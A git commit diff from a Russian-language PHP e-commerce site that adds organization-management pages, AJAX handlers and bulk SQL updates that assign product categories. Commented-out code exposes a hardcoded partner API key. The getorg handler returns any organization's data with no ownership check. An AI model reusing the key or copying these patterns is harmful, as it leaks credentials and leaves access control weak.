2023-02-08

This commit is contained in:
root 2023-02-08 14:59:59 +03:00
parent 650049be31
commit bc4cb5cf18
28129 changed files with 1221290 additions and 64966 deletions

37027
1.sql

File diff suppressed because it is too large Load Diff

BIN
4.epf Executable file

Binary file not shown.

View File

@ -248,6 +248,29 @@
</li> </li>
</ul> </ul>
</li> </li>
<li>
<a href="javascript:;"><i class="sidebar-item-icon fa fa-bookmark"></i>
<span class="nav-label">Мои данные</span><i class="fa fa-angle-left arrow"></i></a>
<ul class="nav-2-level collapse">
<li>
<a href="/lk-my-orgs/">Мои организации</a>
</li>
<li>
<a href="/slider_edit/">Склады</a>
</li>
<li>
<a href="/lk-my-orgs/">Мои менеджеры</a>
</li>
</ul>
</li>
{* <li> {* <li>
<a href="javascript:;"><i class="sidebar-item-icon fa fa-table"></i> <a href="javascript:;"><i class="sidebar-item-icon fa fa-table"></i>
<span class="nav-label">Tables</span><i class="fa fa-angle-left arrow"></i></a> <span class="nav-label">Tables</span><i class="fa fa-angle-left arrow"></i></a>

View File

@ -1,22 +1,58 @@
<?php <?php
ini_set('display_errors', 1 ); ini_set('display_errors', 0 );
if ( !$_SESSION['user_id'] ) die ( 'Кыш' ); if ( !$_SESSION['user_id'] ) die ( 'Кыш' );
switch( @$_POST['act'] ) { switch( @$_POST['act'] ) {
/* ----------------------------------------------------------------------
07.02.2023
Вынимаем данные организации для редактирования
---------------------------------------------------------------------- */
case 'getorg':
$arr=\DB::getAll("SELECT * FROM `org` WHERE `id`=?", $_POST['id']);
echo \json::to_j($arr);
break;
/* ----------------------------------------------------------------------
07.02.2023
Форма добавления коментария
---------------------------------------------------------------------- */
case 'neworg':
//Проверяем, существует ли организация
if ( strlen ( $_POST['inn'] ) == 10 AND !$_POST['kpp'] ){
$vid = 'Юридическое лицо';
$id = \DB::getValue ( "SELECT `id` FROM `org` WHERE `inn`=? AND `kpp`=? LIMIT 1", array( $_POST['inn'], $_POST['kpp'] ) );
}else{
$vid = 'Индивидуальный предприниматель';
$id = \DB::getValue ( "SELECT `id` FROM `org` WHERE `inn`=? LIMIT 1", $_POST['inn'] );
$_POST['kpp'] = '-';
}
if ( !$id ){
$org_id = \DB::add( "INSERT INTO `org` (`txt`, `inn`, `kpp`, `vid`) VALUES(?, ?, ?, ?)", array( $_POST['txt'], $_POST['inn'], $_POST['kpp'], $vid ) );
\DB::add("INSERT INTO `multiOrg` (`user_id`, `org_id`, `status`) VALUES (?, ?, 1)", array( $_SESSION['user_id'], $org_id ) );
}else{
\DB::add("INSERT INTO `multiOrg` (`user_id`, `org_id`, `status`) VALUES (?, ?, 0)", array( $_SESSION['user_id'], $id ) );
}
break;
/* ---------------------------------------------------------------------- /* ----------------------------------------------------------------------
01.11.2022 01.11.2022
Поиск организации по ИНН Поиск организации по ИНН
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
case 'findOrg': case 'findOrg':
$orgInfo = DB::getAll('SELECT * FROM `org` WHERE `inn` = ' . Clean::str($_POST['inn']) . ' LIMIT 1'); $orgInfo = \DB::getAll('SELECT * FROM `org` WHERE `inn` = ? LIMIT 1', $_POST['inn']);
unset($a); unset($a);
$a[0]['err']=1; //Организации не существует $a[0]['err']=1; //Организации не существует
$a[0]['id']=0; //Организации не существует $a[0]['id']=0; //Организации не существует
if ($orgInfo) if ($orgInfo)
$json=$db->to_j($orgInfo); $json=\json::to_j($orgInfo);
else else
$json=$db->to_j($a); $json=\json::to_j($a);
echo $json; echo $json;
break; break;

View File

@ -1,154 +1,130 @@
{include file=$header meta='<meta name="robots" content="noindex,nofollow">' title="Личный кабинет"} {include file=$header_admin meta='<meta name="robots" content="noindex,nofollow">' title="Личный кабинет" h1='Мои организации'}
<!--start breadcrumb--> <h1>Мои организации</h1>
<section class="py-3 border-bottom border-top d-none d-md-flex bg-light">
<div class="container">
<div class="page-breadcrumb d-flex align-items-center">
<h3 class="breadcrumb-title pe-3">Личный кабинет</h3>
<div class="ms-auto">
<nav aria-label="breadcrumb">
<ol class="breadcrumb mb-0 p-0">
<li class="breadcrumb-item"><a href="javascript:;"><i class="bx bx-home-alt"></i> Старт</a>
</li>
<li class="breadcrumb-item active" aria-current="page">Мои организации</li> <div class="row">
</ol>
</nav>
<div class="col-lg-4">
<div class="col-lg-12">
<div class="ibox p-3">
<h3>Добавьте организацию</h3>
<div class="col-md-12">
<label class="form-label">ИНН</label>
<input class="form-control mt-2 mb-2" name="parent" placeholder="ИНН" id="input-inn" maxlength="12">
<div class="alert alert-light hidden" role="alert" id="divShortInfo">
<p><span id="orgName"></span></p>
<div class="btn-group" role="group" aria-label="Простой пример">
<button type="button" class="btn btn-dark" id="btnAddOrg" data-id="">Добавить к себе</button>
<a type="button" class="btn btn-dark" href="#modalNewOrg" data-toggle="modal">Создать новую</a>
</div>
</div>
</div>
</div>
</div>
<div class="col-lg-12">
<div class="ibox p-3">
<h3>Мои организации</h3>
<table class="table">
{section name=customer loop=$listMyOrgs} {if $listMyOrgs[customer].id}
<tr><td><a href="{$listMyOrgs[customer].org_id}" class="editorg">{$listMyOrgs[customer].txt}</a></td></tr>
{/if} {/section}
</table>
</div>
</div>
<div class="col-lg-12">
<div class="ibox p-3">
<h3>На проверке</h3>
<table class="table">
{section name=customer loop=$listMyOrgsCheck} {if $listMyOrgsCheck[customer].id}
<tr><td><a href="/lk_edit_org/{$listMyOrgsCheck[customer].org_id}">{$listMyOrgsCheck[customer].txt}</a></td></tr>
{/if} {/section}
</table>
</div>
</div>
</div>
<div class="col-lg-8">
<div class="ibox">
<div class="ibox-head">
<div class="ibox-title">Данные организации</div>
<ul class="nav nav-tabs tabs-line pull-right">
<li class="nav-item">
<a class="nav-link active" href="#tab-8-1" data-toggle="tab"><i class="fa fa-taxi"></i>Основная информация</a>
</li>
<li class="nav-item">
<a class="nav-link" href="#tab-8-2" data-toggle="tab"><i class="fa fa-bus"></i> Документация</a>
</li>
</ul>
</div>
<div class="ibox-body">
<div class="tab-content">
<div class="tab-pane fade show active" id="tab-8-1">
<form id="formEditOrg">
<input class="form-control mb-2" id="txt" placeholder="Наименование организации">
<input class="form-control mb-2" id="inn" placeholder="ИНН">
<input class="form-control mb-2" id="kpp" placeholder="КПП">
<input class="form-control mb-2" id="ogrn" placeholder="ОГРН">
<input class="form-control mb-2" id="ur_adres" placeholder="Юридический адрес">
<input class="form-control mb-2" id="fact_adres" placeholder="Фактический адрес">
</form>
</div>
<div class="tab-pane" id="tab-8-2">
</div>
</div>
</div>
</div>
</div>
</div>
</div>
{*
Модальное окно с формой создания организации
*}
<div class="modal fade" id="modalNewOrg" tabindex="-1" role="dialog" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered modal-xl" role="document">
<div class="modal-content">
<div class="modal-body">
<div class="container-fluid">
<div class="row">
<div class="col text-right">
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true"> <i class="fa fa-times"></i></span>
</button>
</div>
</div>
</div>
<div class="row">
<div class="col-md-12">
<div class="row">
<div class="col-md-12">
<form id="formNewOrg" action="/act/lk-my-orgs">
<input class="hidden" name="act" value="neworg">
<input class="form-control mb-2" placeholder="ИНН" maxlength="12" name="inn">
<input class="form-control mb-2" placeholder="КПП" maxlength="9" name="kpp">
<input class="form-control mb-2" placeholder="Наименование" name="txt">
<input type="submit" class="btn btn-dark mb-2" id="btnAddOrg" data-id="" name="createOrg" value="Создать">
<div class="alert alert-light hidden" role="alert" id="resultAddOrg">
<p>Готово! Обновите страницу =)</p>
</div>
</form>
</div> </div>
</div> </div>
</div> </div>
</section> </div>
<!--end breadcrumb--> </div>
<!--start shop cart--> </div>
<section class="py-4"> </div>
<div class="container"> {include file=$footer_admin plugins="<script src='/api/jquery/plugins/jquery_chained/jquery.chained.min.js'></script>"}
<h3 class="d-none">Личный кабинет</h3>
<div class="card">
<div class="card-body">
<div class="row">
<div class="col-lg-4">
{include file=$mnulk}
</div>
<div class="col-lg-8">
<div class="card shadow-none mb-0">
<div class="card-body">
<h3>Добавьте организацию</h3>
<div class="row mb-3">
<div class="col-md-12">
<label class="form-label">ИНН</label>
<input class="form-control mt-2 mb-2" name="parent" placeholder="ИНН" id="input-inn" maxlength="12">
</div>
</div>
<div class="row mb-3">
<div class="col-md-12">
<div class="alert alert-success hidden" role="alert" id="divShortInfo">
<span id="orgName"></span>
<br><hr>
<button type="button" class="btn btn-secondary" data-link="/" id="btnShowOrg">
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-exclamation-diamond" viewBox="0 0 16 16">
<path d="M6.95.435c.58-.58 1.52-.58 2.1 0l6.515 6.516c.58.58.58 1.519 0 2.098L9.05 15.565c-.58.58-1.519.58-2.098 0L.435 9.05a1.482 1.482 0 0 1 0-2.098L6.95.435zm1.4.7a.495.495 0 0 0-.7 0L1.134 7.65a.495.495 0 0 0 0 .7l6.516 6.516a.495.495 0 0 0 .7 0l6.516-6.516a.495.495 0 0 0 0-.7L8.35 1.134z"/>
<path d="M7.002 11a1 1 0 1 1 2 0 1 1 0 0 1-2 0zM7.1 4.995a.905.905 0 1 1 1.8 0l-.35 3.507a.552.552 0 0 1-1.1 0L7.1 4.995z"/>
</svg>
<span>Показать информацию</span>
</button>
<button type="button" class="btn btn-secondary" id="btnAddOrg" data-id="">
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-plus-square" viewBox="0 0 16 16">
<path d="M14 1a1 1 0 0 1 1 1v12a1 1 0 0 1-1 1H2a1 1 0 0 1-1-1V2a1 1 0 0 1 1-1h12zM2 0a2 2 0 0 0-2 2v12a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V2a2 2 0 0 0-2-2H2z"/>
<path d="M8 4a.5.5 0 0 1 .5.5v3h3a.5.5 0 0 1 0 1h-3v3a.5.5 0 0 1-1 0v-3h-3a.5.5 0 0 1 0-1h3v-3A.5.5 0 0 1 8 4z"/>
</svg>
<span>Попытаться добавить к себе</span>
</button>
<button type="button" class="btn btn-secondary hidden" id="btnNewOrg">
Организация не найдена, вы можете создать ее
</button>
</div>
</div>
</div>
<div class="row mb-3">
<div class="col-md-12">
<h3>Активные</h3>
<table class="table">
{section name=customer loop=$myOrgs} {if $myOrgs[customer].id}
<tr><td><a href="/lk_edit_org/{$myOrgs[customer].id}">{$myOrgs[customer].txt}</a></td><td>
</td></tr>
{/if} {/section}
</table>
</div>
</div>
<div class="row mb-3">
<div class="col-md-12">
<h3>На проверке</h3>
<table class="table">
{section name=customer loop=$myOrgsOnCheck} {if $myOrgsOnCheck[customer].id}
<tr><td style="width: 50%;">{$myOrgsOnCheck[customer].txt}</td><td>
{if $myOrgsOnCheck[customer].staus==0}
Организация добавлена, но не прошла проверку<br><a href="/lk_edit_org/{$myOrgsOnCheck[customer].id}">Отредактировать и отправить на модерацию</a>
{/if}
</td></tr>
{/if} {/section}
</table>
</div>
</div>
</div>
</div>
</div>
<!--end row-->
</div>
</div>
</div>
</section>
<!--end shop cart-->
{include file=$footer plugins="<script src='/api/jquery/plugins/jquery_chained/jquery.chained.min.js'></script>"}

View File

@ -1,13 +1,27 @@
<?php <?php
ini_set('display_errors', 0); ini_set('display_errors', 0);
require_once MYDIR . '/api/php/db.php';
require_once MYDIR . '/api/php/clean.php';
/* ----------------------------------------------------------------------
07.12.2023
Получаем список своих организаций
---------------------------------------------------------------------- */
$listMyOrgs=\DB::getAll("SELECT * FROM `multiOrg` WHERE `user_id`=? AND `status`=1", $_SESSION['user_id']);
for ($i=0; $i<count($listMyOrgs); $i++)$listMyOrgs[$i]['txt'] = \DB::getValue("SELECT `txt` FROM `org` WHERE `id`=?", $listMyOrgs[$i]['org_id']);
$smarty -> assign( 'listMyOrgs', $listMyOrgs );
/* ----------------------------------------------------------------------
07.12.2023
Получаем список своих организаций на проверке
---------------------------------------------------------------------- */
$listMyOrgsCheck=\DB::getAll("SELECT * FROM `multiOrg` WHERE `user_id`=? AND `status`=0", $_SESSION['user_id']);
for ($i=0; $i<count($listMyOrgsCheck); $i++)$listMyOrgsCheck[$i]['txt'] = \DB::getValue("SELECT `txt` FROM `org` WHERE `id`=?", $listMyOrgsCheck[$i]['org_id']);
$smarty -> assign( 'listMyOrgsCheck', $listMyOrgsCheck );
/* ---------------------------------------------------------------------- /* ----------------------------------------------------------------------
14.10.2022 14.10.2022
Меню личного кабинета Меню личного кабинета
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
$smarty -> assign ( 'mnulk', MYDIR . '/skin/inc/mnulk.html'); //$smarty -> assign ( 'mnulk', MYDIR . '/skin/inc/mnulk.html');
/* ---------------------------------------------------------------------- /* ----------------------------------------------------------------------
01.05.2021 01.05.2021
@ -21,24 +35,24 @@ if ( !$_SESSION['user_id'] && !ID ) header ( 'Location: /login/' );
Получаем опции пользователя для меню Получаем опции пользователя для меню
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
$userOption = DB::getAll('SELECT * FROM `userOption` WHERE `user_id` = ' . Clean::str($_SESSION['user_id']) . ' LIMIT 1'); //$userOption = DB::getAll('SELECT * FROM `userOption` WHERE `user_id` = ' . Clean::str($_SESSION['user_id']) . ' LIMIT 1');
$smarty -> assign( 'userOption', $userOption ); //$smarty -> assign( 'userOption', $userOption );
/* ---------------------------------------------------------------------- /* ----------------------------------------------------------------------
06.11.2022 06.11.2022
Получаем список своих организаций Получаем список своих организаций
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
/*
$myOrgsOnCheck = DB::getAll('SELECT * FROM `org` WHERE `id` IN (SELECT `org_id` FROM `multiOrg` WHERE `user_id`=' . $_SESSION['user_id'] . ' AND `status`<>1 )'); $myOrgsOnCheck = \DB::getAll('SELECT * FROM `org` WHERE `id` IN (SELECT `org_id` FROM `multiOrg` WHERE `user_id`=' . $_SESSION['user_id'] . ' AND `status`<>1 )');
for ($i=0; $i<count($myOrgsOnCheck); $i++){ for ($i=0; $i<count($myOrgsOnCheck); $i++){
$myOrgsOnCheck[$i]['status'] = DB::getValue("SELECT `status` FROM `multiOrg` WHERE `org_id` = " . $myOrgsOnCheck[$i]['id']); $myOrgsOnCheck[$i]['status'] = \DB::getValue("SELECT `status` FROM `multiOrg` WHERE `org_id` = " . $myOrgsOnCheck[$i]['id']);
} }
$smarty -> assign( 'myOrgsOnCheck', $myOrgsOnCheck ); $smarty -> assign( 'myOrgsOnCheck', $myOrgsOnCheck );
$myOrgs = DB::getAll('SELECT * FROM `org` WHERE `id` IN (SELECT `org_id` FROM `multiOrg` WHERE `user_id`=' . $_SESSION['user_id'] . ' AND `status`=1 )'); $myOrgs = \DB::getAll('SELECT * FROM `org` WHERE `id` IN (SELECT `org_id` FROM `multiOrg` WHERE `user_id`=' . $_SESSION['user_id'] . ' AND `status`=1 )');
$smarty -> assign( 'myOrgs', $myOrgs ); $smarty -> assign( 'myOrgs', $myOrgs );
*/
?> ?>

View File

@ -1,3 +1,120 @@
/* ----------------------------------------------------------------------
07.02.2023
Форма добавления коментария
---------------------------------------------------------------------- */
$("#formNewOrg").submit(function(event) {
event.preventDefault();
var formData = new FormData(this);
$.ajax({
type: 'POST', // Тип запроса
url: $(this).attr('action'), // Скрипт обработчика
data: formData, // Данные которые мы передаем
cache: false, // В запросах POST отключено по умолчанию, но перестрахуемся
contentType: false, // Тип кодирования данных мы задали в форме, это отключим
processData: false,
success: function(data) {}
});
$("#resultAddOrg").removeClass('hidden');
})
/* ----------------------------------------------------------------------
07.02.2023
Вынимаем данные организации для редактирования
---------------------------------------------------------------------- */
$(".editorg").click(function(event) {
$.ajax({
type: 'POST',
url: '/act/lk-my-orgs',
data: 'act=getorg&id=' + $(this).attr('href'),
dataType: 'json',
success: function(data) {
$.each(data, function(index, element){
$("#txt").val(element.txt);
$("#inn").val(element.inn);
$("#kpp").val(element.kpp);
$("#ogrn").val(element.ogrn);
})
}
});
return false;
})
/* ----------------------------------------------------------------------
01.11.2022
Поиск организации по ИНН
---------------------------------------------------------------------- */
function showOrg(data){
alert(data);
}
$("#input-inn").keyup(function(event) {
var inn=$(this).val();
//Отправлять аякс запрос только в том случае, если длина ИНН 10 или 12 символов
if (inn.length==10 || inn.length==12 ){
$.ajax({
type: 'POST',
url: '/act/lk-my-orgs',
data: 'act=findOrg&inn=' + inn,
dataType: 'json',
success: function(data) {
$.each(data, function(index, element){
if (element.err==1){
$("#divShortInfo").removeClass("hidden");
$("#btnNewOrg").removeClass("hidden");
$("#orgName").html('');
$("#btnShowOrg").addClass("hidden");
$("#btnAddOrg").addClass("hidden");
}else{
$("#divShortInfo").removeClass("hidden");
$("#btnShowOrg").removeClass("hidden");
$("#btnAddOrg").removeClass("hidden");
$("#orgName").html(element.txt);
$("#btnShowOrg").data('link', '/show_org/' + element.id);
$("#btnAddOrg").data('id', element.id);
$("#btnNewOrg").addClass("hidden");
}
})
}
});
}else{
$("#divShortInfo").addClass("hidden");
}
})
/* ----------------------------------------------------------------------
07.11.2022
Пробуем добавить организацию к себе и смотрим ошибки
Ошибка - организация уже имеет администратора
---------------------------------------------------------------------- */
$("#btnAddOrg").click(function(event) {
var id=$(this).data('id');
$.ajax({
type: 'POST',
url: '/act/lk-my-orgs',
data: 'act=addOrg&id=' + id,
dataType: 'json',
success: function(data) {
$.each(data, function(index, element){
})
}
});
})
$("#sel-children-city").chained("#sel-parent-region");
/*
function getRandomInt(min, max) { function getRandomInt(min, max) {
min = Math.ceil(min); min = Math.ceil(min);
max = Math.floor(max); max = Math.floor(max);
@ -8,7 +125,7 @@ function getRandomInt(min, max) {
03.06.2022 03.06.2022
Сохраняем информацию о пользователе Сохраняем информацию о пользователе
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
/*
$('#user_json').submit(function(event) { $('#user_json').submit(function(event) {
event.preventDefault(); event.preventDefault();
var formData = new FormData(this); var formData = new FormData(this);
@ -28,6 +145,7 @@ $('#user_json').submit(function(event) {
04.06.2022 04.06.2022
Ищем организацию по ИНН Ищем организацию по ИНН
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
/*
function org_name(txt) { function org_name(txt) {
if (txt == '1') { if (txt == '1') {
$("#input-org_name").val(''); $("#input-org_name").val('');
@ -56,7 +174,7 @@ $('#input-inn').keyup(function(event) {
05.06.2022 05.06.2022
Сохранение адреса доставки Сохранение адреса доставки
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
/*
function add_adres_append(gorod, street, dom) { function add_adres_append(gorod, street, dom) {
var new_tr = '<tr><td style="text-align: left;">' + gorod + ' ' + street + ' ' + dom + '</td><td style="width: 20px;"></td></tr>'; var new_tr = '<tr><td style="text-align: left;">' + gorod + ' ' + street + ' ' + dom + '</td><td style="width: 20px;"></td></tr>';
$("#table_adres").append(new_tr); $("#table_adres").append(new_tr);
@ -89,7 +207,7 @@ $('#add_adres').submit(function(event) {
05.06.2022 05.06.2022
Удаление адресов Удаление адресов
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
/*
$('.img-del').click(function(event) { $('.img-del').click(function(event) {
var id = $(this).data('id'); var id = $(this).data('id');
$("#" + id).hide("600"); $("#" + id).hide("600");
@ -106,6 +224,7 @@ $('.img-del').click(function(event) {
10.10.2022 10.10.2022
Сохранение личной информации (p006) Сохранение личной информации (p006)
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
/*
$('#btnSave-p006').click(function(event) { $('#btnSave-p006').click(function(event) {
//event.preventDefault(); //event.preventDefault();
var familiya = $("#familiya").val(); var familiya = $("#familiya").val();
@ -162,7 +281,7 @@ $("#input-summ").keyup(function(event) {
}); });
*/ */
/*
}) })
//Показываем окошко удаления обложки //Показываем окошко удаления обложки

View File

@ -1,33 +1,67 @@
<?php <?php
/*
\DB::set("UPDATE `tovar` SET `category`=138, `status`=1 WHERE `title` LIKE 'Бумага протирочная%'");
\DB::set("UPDATE `tovar` SET `category`=34, `status`=1 WHERE `title` LIKE 'Шкаф%'");
\DB::set("UPDATE `tovar` SET `category`=140, `status`=1 WHERE `title` LIKE 'Бусины для творчества%'");
\DB::set("UPDATE `tovar` SET `category`=141, `status`=1 WHERE `title` LIKE 'Весы электронные%'");
\DB::set("UPDATE `tovar` SET `category`=141, `status`=1 WHERE `title` LIKE 'Весы торговые%'");
\DB::set("UPDATE `tovar` SET `category`=141, `status`=1 WHERE `title` LIKE 'Весы фасовочные%'");
\DB::set("UPDATE `tovar` SET `category`=142, `status`=1 WHERE `title` LIKE 'Вешалка%'");
\DB::set("UPDATE `tovar` SET `category`=143, `status`=1 WHERE `title` LIKE 'Визитница%'");
\DB::set("UPDATE `tovar` SET `category`=144, `status`=1 WHERE `title` LIKE 'Бумага мешочная%'");
\DB::set("UPDATE `tovar` SET `category`=41, `status`=1 WHERE `title` LIKE 'Стакан бумажный%'");
\DB::set("UPDATE `tovar` SET `category`=117, `status`=1 WHERE `title` LIKE 'Зубная щетка%'");
\DB::set("UPDATE `tovar` SET `category`=146, `status`=1 WHERE `title` LIKE 'Букварь %'");
\DB::set("UPDATE `tovar` SET `category`=147, `status`=1 WHERE `title` LIKE 'Бумага для выпечки%'");
\DB::set("UPDATE `tovar` SET `category`=148, `status`=1 WHERE `title` LIKE 'Бумага для оригами%'");
\DB::set("UPDATE `tovar` SET `category`=135, `status`=1 WHERE `title` LIKE 'Бумага для ЭЭГ%'");
\DB::set("UPDATE `tovar` SET `category`=135, `status`=1 WHERE `title` LIKE 'Бумага для ФМ%'");
\DB::set("UPDATE `tovar` SET `category`=149, `status`=1 WHERE `title` LIKE 'Бумага упаковочная%'");
\DB::set("UPDATE `tovar` SET `category`=150, `status`=1 WHERE `title` LIKE 'Ватные палочки%'");
\DB::set("UPDATE `tovar` SET `category`=151, `status`=1 WHERE `title` LIKE 'Ватные диски%'");
\DB::set("UPDATE `tovar` SET `category`=152, `status`=1 WHERE `title` LIKE 'Веб-камера%'");
\DB::set("UPDATE `tovar` SET `category`=153, `status`=1 WHERE `title` LIKE 'Ведро 10%'");
\DB::set("UPDATE `tovar` SET `category`=153, `status`=1 WHERE `title` LIKE 'Ведро 12%'");
\DB::set("UPDATE `tovar` SET `category`=153, `status`=1 WHERE `title` LIKE 'Ведро 8%'");
\DB::set("UPDATE `tovar` SET `category`=153, `status`=1 WHERE `title` LIKE 'Ведро 9%'");
\DB::set("UPDATE `tovar` SET `category`=153, `status`=1 WHERE `title` LIKE 'Ведро VILEDA%'");
\DB::set("UPDATE `tovar` SET `category`=153, `status`=1 WHERE `title` LIKE 'Ведро пластиковое%'");
\DB::set("UPDATE `tovar` SET `category`=62, `status`=1 WHERE `title` LIKE '%мыло жидкое%'");
\DB::set("UPDATE `tovar` SET `category`=154, `status`=1 WHERE `title` LIKE 'Веник%'");
\DB::set("UPDATE `tovar` SET `category`=155, `status`=1 WHERE `title` LIKE 'Вентилятор напольный%'");
\DB::set("UPDATE `tovar` SET `category`=155, `status`=1 WHERE `title` LIKE 'Вентилятор настольный%'");*/
\DB::set("UPDATE `tovar` SET `category`=156, `status`=1 WHERE `title` LIKE 'Весы кухонные%'");
\DB::set("UPDATE `tovar` SET `category`=118, `status`=1 WHERE `title` LIKE '%дезинфицирующее средство%'");
\DB::set("UPDATE `tovar` SET `category`=118, `status`=1 WHERE `title` LIKE '%Абактерил-Клинер 1 л%'");
\DB::set("UPDATE `tovar` SET `category`=61, `status`=1 WHERE `title` LIKE '%кожный антисептик%'");
\DB::set("UPDATE `tovar` SET `category`=61, `status`=1 WHERE `title` LIKE '%антисептик%для рук%'");
\DB::set("UPDATE `tovar` SET `category`=157, `status`=1 WHERE `title` LIKE '%весы%меди%'");
\DB::set("UPDATE `tovar` SET `category`=157, `status`=1 WHERE `title` LIKE '%весы%анал%'");
\DB::set("UPDATE `tovar` SET `category`=157, `status`=1 WHERE `title` LIKE '%весы лабо%'");
/* ----------------------------------------------------------------------
05.02.2023
Костыль против пустоты, если в категории нет товара,
переходим в первую подкатегорию
---------------------------------------------------------------------- */
if (!$childrenTovar){
//echo "SELECT `id` FROM `tovar_category` WHERE `category`=" . $pieces[0] . " ORDER BY `title` LIMIT 1";
$redir_id=\DB::getValue( "SELECT `id` FROM `tovar_category` WHERE `category`=? ORDER BY `title` LIMIT 1", $pieces[0] );
if ($redir_id)header( 'Location: /tovar_cat/' . $redir_id . '-1.html' );
}
\DB::set("UPDATE `tovar` SET `category`=116, `status`=1 WHERE `title` LIKE 'Скоросшивател%'");
\DB::set("UPDATE `tovar` SET `category`=96, `status`=1 WHERE `title` LIKE 'Салфетка влажная%'");
\DB::set("UPDATE `tovar` SET `category`=104, `status`=1 WHERE `title` LIKE 'Бумага XEROX%'");
\DB::set("UPDATE `tovar` SET `category`=104, `status`=1 WHERE `title` LIKE 'Бумага офисная%'");
\DB::set("UPDATE `tovar` SET `category`=104, `status`=1 WHERE `title` LIKE 'Бумага COLOR COPY%'");
\DB::set("UPDATE `tovar` SET `category`=105, `status`=1 WHERE `title` LIKE 'Бумага для акварели%'");
\DB::set("UPDATE `tovar` SET `category`=106, `status`=1 WHERE `title` LIKE 'Бумага для пастели%'");
\DB::set("UPDATE `tovar` SET `category`=107, `status`=1 WHERE `title` LIKE 'Бумага для рисования%'");
\DB::set("UPDATE `tovar` SET `category`=108, `status`=1 WHERE `title` LIKE 'Ватман %'");
\DB::set("UPDATE `tovar` SET `category`=109, `status`=1 WHERE `title` LIKE 'Грамота %'");
\DB::set("UPDATE `tovar` SET `category`=110, `status`=1 WHERE `title` LIKE 'Дневник %'");
\DB::set("UPDATE `tovar` SET `category`=111, `status`=1 WHERE `title` LIKE 'Еженедельник %'");
\DB::set("UPDATE `tovar` SET `category`=112, `status`=1 WHERE `title` LIKE 'Закладка для книг%'");
\DB::set("UPDATE `tovar` SET `category`=112, `status`=1 WHERE `title` LIKE 'Закладки для книг%'");
\DB::set("UPDATE `tovar` SET `category`=112, `status`=1 WHERE `title` LIKE 'Закладки клейкие%'");
\DB::set("UPDATE `tovar` SET `category`=113, `status`=1 WHERE `title` LIKE 'Книга%учета %'");
\DB::set("UPDATE `tovar` SET `category`=114, `status`=1 WHERE `title` LIKE 'Книжка%раскраска%'");
\DB::set("UPDATE `tovar` SET `category`=114, `status`=1 WHERE `title` LIKE 'Раскраска%-анти%'");
\DB::set("UPDATE `tovar` SET `category`=115, `status`=1 WHERE `title` LIKE 'Конверты %'");
\DB::set("UPDATE `tovar` SET `category`=115, `status`=1 WHERE `title` LIKE 'Конверт%пакет%'");
\DB::set("UPDATE `tovar` SET `category`=19, `status`=1 WHERE `title` LIKE 'Папка для бумаг%'");
\DB::set("UPDATE `tovar` SET `category`=19, `status`=1 WHERE `title` LIKE 'Папка для акварели%'");
\DB::set("UPDATE `tovar` SET `category`=19, `status`=1 WHERE `title` LIKE 'Папка для пастели%'");
\DB::set("UPDATE `tovar` SET `category`=19, `status`=1 WHERE `title` LIKE 'Папка для черче%'");
\DB::set("UPDATE `tovar` SET `category`=19, `status`=1 WHERE `title` LIKE 'Папка для рисовани%'");
\DB::set("UPDATE `tovar` SET `category`=19, `status`=1 WHERE `title` LIKE 'Папка для эск%'");
\DB::set("UPDATE `tovar` SET `category`=19, `status`=1 WHERE `title` LIKE 'Папка%обложка%'");
\DB::set("UPDATE `tovar` SET `category`=19, `status`=1 WHERE `title` LIKE 'Папка%планшет%'");
//echo "UPDATE `tovar` SET `category`=104, `status`=1 WHERE `title` LIKE 'Бумага COLOR COPY%'"; //echo "UPDATE `tovar` SET `category`=104, `status`=1 WHERE `title` LIKE 'Бумага COLOR COPY%'";
/* /*

View File

@ -1,7 +1,7 @@
<?php <?php
ini_set( 'display_errors', 0 ); ini_set( 'display_errors', 0 );
@mkdir( 'img/' . $_SERVER['SERVER_NAME'] . '/cert', 0700 ); @mkdir( 'img/' . $_SERVER['SERVER_NAME'] . '/cert', 0700 );
$smarty -> caching = true; $smarty -> caching = false;
$smarty -> cache_lifetime = 86400; $smarty -> cache_lifetime = 86400;
/* ---------------------------------------------------------------------- /* ----------------------------------------------------------------------
17.12.2022 17.12.2022
@ -37,37 +37,7 @@ $smarty->assign('catImg', \DB::getValue( "SELECT `filename` FROM `tovar_category
---------------------------------------------------------------------- */ ---------------------------------------------------------------------- */
$cena=\DB::getAll ( "SELECT `cena`, `t` FROM `tovar_price_history` WHERE `status`=1 AND `tovar_id`=? ORDER BY `t` DESC", $_GET['id']); $cena=\DB::getAll ( "SELECT `cena`, `t` FROM `tovar_price_history` WHERE `status`=1 AND `tovar_id`=? ORDER BY `t` DESC", $_GET['id']);
/*
//Из t вычитаем три дня
$d = time() - $cena[0]['t'];
if ( $d > 129600 && $page[0]['partner']=='samson'){ //Берем цену с сайта партнера
//Используем апи
$curl = curl_init('https://api.samsonopt.ru/v1/sku/' . $page[0]['artikul'] . '/price/?api_key=4e2ef85d3ec9e27cc2a148c74a47d804');
$arHeaderList = array();
$arHeaderList[] = 'Accept: application/json';
$arHeaderList[] = 'User-Agent: 4e2ef85d3ec9e27cc2a148c74a47d804';
$arHeaderList[] = 'Accept-Encoding: gzip';
curl_setopt($curl, CURLOPT_HTTPHEADER, $arHeaderList);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_ENCODING, 'gzip');
$result = curl_exec($curl);
curl_close($curl);
$cena_p = \json :: from_j ( $result );
$partner_cena = round ( $cena_p['data'][0]['value'] * 1.5 );
if ( $partner_cena != $cena[0]['cena'] ){
//Создаем документ+пишем в регистр
$massiv[0]['tovar_id']=$_GET['id'];
$massiv[0]['cena']=$partner_cena;
$json=\json::to_j($massiv);
